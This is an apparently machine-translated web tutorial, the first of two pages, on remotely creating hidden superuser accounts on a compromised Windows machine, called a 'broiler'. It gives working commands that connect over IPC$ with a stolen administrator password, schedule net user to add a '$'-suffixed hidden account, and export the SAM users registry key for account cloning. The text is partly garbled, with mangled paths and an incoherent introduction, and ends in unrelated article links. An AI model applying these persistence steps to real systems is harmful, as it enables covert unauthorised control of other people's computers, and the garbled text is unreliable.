A superuser is a user who is responsible for managing and maintaining the network. This term has a special meaning on the NetWare web. The superuser has full access to all file files, directories, and files, and is the first user to log in to the server after installation. The superuser then immediately changes the password so no other users can access the server and gain unlimited access to the superuser. So how do you hide the superusers in the system? Here are a list of the various hidden superuser methods in the system.
First, how to remotely create hidden superusers under the command line
The command of at will be used here, because the scheduled task generated by at is run as the system, so the psu.exe program is not used. In order to be able to use the at command, the broiler must have the service of the schedule. If it is not enabled, it can be started remotely by using the tool netsvc.exe or sc.exe in the streamer. Of course, the method can also be used as long as the schedule service can be started.
For the command line mode, you can use a variety of connection methods, such as using SQLexec to connect MSSQL port 1433, you can also use the telnet service, as long as you can get a cmdshell, and have the right to run the at command can.
1. First find a broiler. As for how to find it, it is not the topic I mentioned here. Here we assume that we have found a broiler with a superuser of administrator and a password of 12345678. Now we start to create a hidden superuser for it remotely from the command line. (The host in the example is a host in my LAN. I changed its ip address to 13.50.97.238. Do not sit in the Internet to avoid harassing the normal ip address.)
2 First, establish a connection with the broiler, the command is: net use 13.50.97.238ipc$ "12345678" /user:"administrator
3. Use the at command to create a user on the broiler (if the at service is not started) , can be started remotely with netsvc.exe or sc.exe):
at 13.50.97.238 12:51 c:\\winntsystem32net.exe user hacker$ 1234 /add
Create this The user name with the $ character is added. Because the $ character is added, the user will not be displayed with the net user on the command line, but the user can be seen in the account manager.
4, also use the at command to export the HKEY_LOCAL_MACHINEsamsamDomainsaccountusers key:
at 13.50.97.238 12:55 c:\\winntregedit.exe /e hacker.reg
HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers< Br>
/e is the parameter of regedit.exe, which must end in the _LOCAL_MACHINESAMSAMDomainsaccountusers key. If necessary, you can enclose "ld:;c:\\winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers”" in quotation marks. Previous12Next page Total 2 pages
When we use the WinXP system computer, every time we turn on the computer, the firs
For the general system, the system account belongs to the Administrator, which is the administrators
We all know that cookies are used to record user IDs, passwords, pages that have be
A lot of rookies will faint about what is the system disk. In fact, the C disk in t
Save win xp memory resources operation
How to turn off the music that comes with WinXP theme
Using Windows XP skills to easily eliminate garbled copy
How to solve the problem of WinXP boot blue screen error code 0x00000024?
Three tips for protecting hard drive data privacy
How to open voice recognition system in WinXP
What should I do if XP fails to start after upgrading to Vista?
How to solve the problem of missing dfst.dll in WinXP installation CAD prompt?
Those reasons for inventory restore point failure
How to uninstall PHPnow in WinXP? Completely uninstall PHPnow method
WinXP hard disk has bad sectors how to fix? How to repair bad sectors of the hard disk
Windows7 will transfer the virtual memory of the C drive to the D drive
Break through the difficulties - Win XP shutdown failure full contact
WindowsX system desktop card dead no response is only forced shutdown?
Analysis of Linux system computer crash causes
Win7 system full screen play CS game screen how to remove black edges
How to use video conversion software under Linux operating system
Win10 can't play RMVB format video solution
In the win8 system model installed win7 system operation tips to solve